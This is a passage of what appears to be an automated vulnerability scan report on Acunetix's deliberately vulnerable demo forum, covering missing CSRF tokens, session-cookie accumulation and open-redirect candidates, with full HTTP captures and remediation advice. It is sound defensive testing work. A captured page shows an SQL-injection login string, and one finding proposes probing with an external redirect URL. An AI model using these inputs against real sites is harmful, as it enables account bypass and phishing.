Remove user control over the filesystem path:

  • Avoid passing user input to filesystem APIs. Where possible map an opaque identifier to a server-side path via a fixed lookup table.
  • Canonicalise and verify containment - resolve the requested path to its canonical absolute form and confirm it is still inside the intended base directory before opening it; reject otherwise.
  • Strict allow-list validation of the filename (e.g. a known set of names, or [A-Za-z0-9_-] with a fixed extension); decode once and reject traversal sequences and null bytes.
  • Disable remote/dynamic inclusion (e.g. PHP allow_url_include) and run with least filesystem privilege.

Low CWE-352 - Cross-Site Request Forgery 2 findings

↩ Glossary42. Login form lacks anti-CSRF token
Severity: Low  |  Confidence: Tentative  |  CWE: CWE-352 [ref]  |  OWASP: A01:2021  |  Discovered: 2026-07-19 14:11:05
URL
http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2
Detail
The returned authentication form contains only the tfUName and tfUPass fields and a submit button with no hidden anti-CSRF token or equivalent per-request nonce. A state-changing POST that relies solely on cookies (as this ASP application does) can be forged by a third-party page, enabling login-CSRF where a victim is silently authenticated into an attacker-controlled account.
AI Confidence
55%
Evidence
<form action="" method="POST"> ... <input name="tfUName" ...> ... <input name="tfUPass" type="password" ...> ... <input type="submit" value="Login"> (no hidden token field present)
HTTP Request
Full request
GET /Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/showforum.asp?id=2
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 18:09:02 GMT
Content-Length: 3214


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum login</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" -->
<!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
		<form action="" method="POST">
		<table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm">
            <tr>
              <td>Username:</td>
              <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td>
            </tr>
            <tr>
              <td>Password:</td>
              <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td>
            </tr>
            <tr>
              <td>&nbsp;</td>
              <td align="right"><input type="submit" value="Login"></td>
            </tr>
          </table>
	  </form>
		  
    <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Cross-site request forgery (CSRF) lets an attacker induce a victim's browser to send a state-changing request to an application in which the victim is authenticated, causing an action to be performed without the victim's intent. It is possible when a request relies solely on credentials the browser sends automatically (such as session cookies) and contains no value the attacker cannot determine or predict.

Impact equals whatever the targeted function does on the victim's behalf - changing an email/password, transferring funds, or altering settings - and can be severe for privileged accounts.

Remediation

Require proof the request originated from the application:

  • Anti-CSRF tokens - include a per-session (or per-request) unpredictable token in state-changing requests and verify it server-side; use a framework's built-in protection where available.
  • SameSite cookies - set SameSite=Lax or Strict on session cookies as defence in depth.
  • For sensitive actions, re-authenticate or verify the Origin/Referer.
↩ Glossary43. Message-post form lacks anti-CSRF token
Severity: Low  |  Confidence: Tentative  |  CWE: CWE-352 [ref]  |  OWASP: A01:2021  |  Discovered: 2026-07-19 14:13:35
URL
http://testasp.vulnweb.com/showforum.asp?id=2
Detail
The response contains a state-changing form, frmPostMessage (method=post) with fields tfSubject and tfText for posting a new thread, but no anti-CSRF token field is present in the rendered form. Without a per-request/per-session token, an attacker can host a page that auto-submits this form to post messages in the context of an authenticated victim.
AI Confidence
55%
Evidence
<form name="frmPostMessage" method="post" ...> with inputs tfSubject and tfText and no hidden CSRF token field.
HTTP Request
Full request
GET /showforum.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 18:09:26 GMT
Content-Length: 4010


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum Miscellaneous</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" -->
<!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout admin' or '1'='1</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
	<div class="path">
			Miscellaneous
		</div>
	<table width="100%" border="0" cellspacing="0" cellpadding="5">
      <tr>
        <td class="tableheader">Thread</td>
        <td class="tableheader">Posts</td>
		<td class="tableheader">Posted by</td>
        <td class="tableheader">Last Post</td>
      </tr>   
	
	</table>
	
      <!-- tinyMCE -->
      <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script>
      <script language="javascript" type="text/javascript">
	// Notice: The simple theme does not use all options some of them are limited to the advanced theme
	tinyMCE.init({
		mode : "textareas",
		theme : "simple"
	});
		</script>
      <!-- /tinyMCE -->
      <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded">
        <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm">
          <tr>
            <td>Thread title<br>
              <center>
                <input name="tfSubject" type="text" class="postit" id="tfSubject">
              </center></td>
          </tr>
          <tr>
            <td>Thread message<br>
              <center>
                <textarea name="tfText" class="postit" id="tfText"></textarea>
              </center></td>
          </tr>
          <tr>
            <td align="right"><input type="submit" value="Post it"></td>
          </tr>
        </table>
      </form>
      
	<!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Cross-site request forgery (CSRF) lets an attacker induce a victim's browser to send a state-changing request to an application in which the victim is authenticated, causing an action to be performed without the victim's intent. It is possible when a request relies solely on credentials the browser sends automatically (such as session cookies) and contains no value the attacker cannot determine or predict.

Impact equals whatever the targeted function does on the victim's behalf - changing an email/password, transferring funds, or altering settings - and can be severe for privileged accounts.

Remediation

Require proof the request originated from the application:

  • Anti-CSRF tokens - include a per-session (or per-request) unpredictable token in state-changing requests and verify it server-side; use a framework's built-in protection where available.
  • SameSite cookies - set SameSite=Lax or Strict on session cookies as defence in depth.
  • For sensitive actions, re-authenticate or verify the Origin/Referer.

Low CWE-384 1 finding

↩ Glossary44. Proliferation of ASP session cookies indicating session management weakness
Severity: Low  |  Confidence: Tentative  |  CWE: CWE-384 [ref]  |  OWASP: A07:2021  |  Discovered: 2026-07-19 11:34:14
URL
http://testasp.vulnweb.com/Templatize.asp?item=html/about.html
Detail
The request presents ten distinct ASPSESSIONID* cookies simultaneously, each corresponding to a separate server-issued session. This accumulation of unexpired session identifiers suggests the application does not properly invalidate or consolidate sessions, which can indicate a lack of session regeneration on state changes and increases the exposure surface for session fixation and reuse.
AI Confidence
60%
Evidence
Cookie header contains 10 concurrent tokens: ASPSESSIONIDCSDDASDC, ASPSESSIONIDCQDADSDD, ASPSESSIONIDACBTRBSB, ASPSESSIONIDCACTQATA, ASPSESSIONIDCCBSQBSA, ASPSESSIONIDACBRTATA, ASPSESSIONIDACDRSBTA, ASPSESSIONIDCCDQTASB, ASPSESSIONIDCAASTBSA, ASPSESSIONIDAACSSATB
HTTP Request
Full request
GET /Templatize.asp?item=html/about.html HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Default.asp
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 15:32:23 GMT
Content-Length: 4594


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>Untitled Document</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
		<h1>About this website</h1>
<p>The website was built with the intention to test the Acunetix Web Vulnerability
Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate
the forementioned software's capabilities to find those bugs.</p>
<p><b>Please DO NOT use this website as a forum site. DO NOT post any sensitive
information on this site. This includes e-mail addresses or real names.</b></p>
<h1>About Acunetix</h1>
<P><B>Combating the web vulnerability threat<BR>
	</B>Securing a company's web applications is today's most overlooked aspect of 
	securing the enterprise. Web application hacking is on the rise with as many as 
	75% of cyber attacks done at web application level or via the web. Most 
	corporations have secured their data at the network level, but have overlooked 
	the crucial step of checking whether their web applications are vulnerable to 
	attack. Web applications, which often have a direct line into the company's 
	most valuable data assets, are online 24/7, completely unprotected by a 
	firewall and therefore easy prey for attackers.</P>
<P>Acunetix was founded with this threat in mind. We realised the only way to 
	combat web site hacking was to develop an automated tool that could help 
	companies scan their web applications for vulnerabilities. In July 2005, 
	Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
	website for vulnerabilities to SQL injection, cross site scripting and other 
	web attacks before hackers do.</P>
<P>The Acunetix development team consists of highly experienced security developers 
	who have each spent years developing network security scanning software prior 
	to starting development on Acunetix WVS. The management team is backed by years 
	of experience marketing and selling security software.</P>
<P>Acunetix is a privately held company with its <A href="http://www.acunetix.com/company/contact.htm">
		offices</A> in Malta, US and the UK.<BR>
</P>
		<!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Session fixation and poor session lifecycle management arise when an application fails to issue a fresh session identifier at authentication boundaries or fails to invalidate stale sessions. Attackers can exploit predictable or long-lived sessions to fixate a known identifier onto a victim or to reuse captured tokens, leading to unauthorised access.

Remediation

Regenerate the session identifier upon each privilege change (especially login) and invalidate the previous one. Ensure sessions expire and are cleared server-side on logout and after inactivity, and avoid emitting multiple concurrent session cookies for the same client.

Low CWE-601 - Open Redirect 3 findings

↩ Glossary45. Open redirect / external URL parameter 'RetURL'
Severity: Low  |  Confidence: Tentative  |  CWE: CWE-601 [ref]  |  OWASP: A01:2021  |  Discovered: 2026-07-18 19:43:18
URL
http://testasp.vulnweb.com/Search.asp?tfSearch=test
Detail
The login and register links embed a 'RetURL' parameter that carries a URL-encoded return path (%2FSearch%2Easp%3FtfSearch%3Dtest). If the application redirects to this value after authentication without validating it against an allow-list, an attacker can supply an absolute external URL to redirect victims to a phishing site. The parameter is user-influenced and used as a post-action navigation target.
AI Confidence
60%
Evidence
href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3Dtest"
HTTP Request
Full request
GET /Search.asp?tfSearch=test HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=admin
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG; path=/
X-Powered-By: ASP.NET
Date: Sat, 18 Jul 2026 23:41:46 GMT
Content-Length: 2964


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum search</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3Dtest" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3Dtest" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
      <form name="frmSearch" method="get" action="">
        <div class="FramedForm">
          <input name="tfSearch" type="text" class="search">
          <input class="search" type="submit" value="search posts">
        </div>
      </form>      
        <div class='path'>You searched for 'test'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table>      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

An open redirection vulnerability arises when an application incorporates user-controllable input into the target of a redirect without validating that the destination is permitted. An attacker crafts a link to the trusted application that transparently forwards the victim to an attacker-controlled site.

Open redirects are most damaging when leveraged in phishing - the link bears the trusted domain, lending credibility to credential-harvesting pages - and as a building block in OAuth token theft and to bypass URL allow-lists in other controls. Severity is usually medium, higher where it enables token/credential theft.

Remediation

Remove user control over the redirect destination:

  • Avoid user-supplied redirect targets. Where a return location is needed, store it server-side or map a short, validated token to a fixed URL.
  • Allow-list destinations - validate the target against a list of permitted URLs/paths; for same-site navigation accept only relative paths and reject absolute URLs, protocol-relative (//host) and scheme-bearing values.
  • Show an interstitial for any off-site redirect so the user can see where they are being sent.
↩ Glossary46. Open redirect candidate in 'RetURL' parameter
Severity: Low  |  Confidence: Tentative  |  CWE: CWE-601 [ref]  |  OWASP: A01:2021  |  Discovered: 2026-07-19 13:37:58
URL
http://testasp.vulnweb.com/showthread.asp?id=1
Detail
The login and register links embed a 'RetURL' parameter that carries a URL-encoded return path (RetURL=%2Fshowthread%2Easp%3Fid%3D1, i.e. /showthread.asp?id=1). Parameters that hold a post-action destination are a common open-redirect sink if the value is used to build a redirect without validating that it points to the same site. This cannot be confirmed from the captured response alone, so it is reported for verification by supplying an external URL (e.g. RetURL=https://evil.example).
AI Confidence
60%
Evidence
<a href="./login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1">login</a>  and  register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1
HTTP Request
Full request
GET /showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="144", "Not=A?Brand";v="8", "Chromium";v="144"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=GOOKGGOBIDCPDDOIBCOBOPFH; path=/
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 17:35:48 GMT
Connection: close
Content-Length: 3031


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum
2
</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
		<div class="path">
			<a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/2
		</div>
      <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5">
        <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:28 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>2</div><div class='posttext'>2</div></td></tr>
      </table>
      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
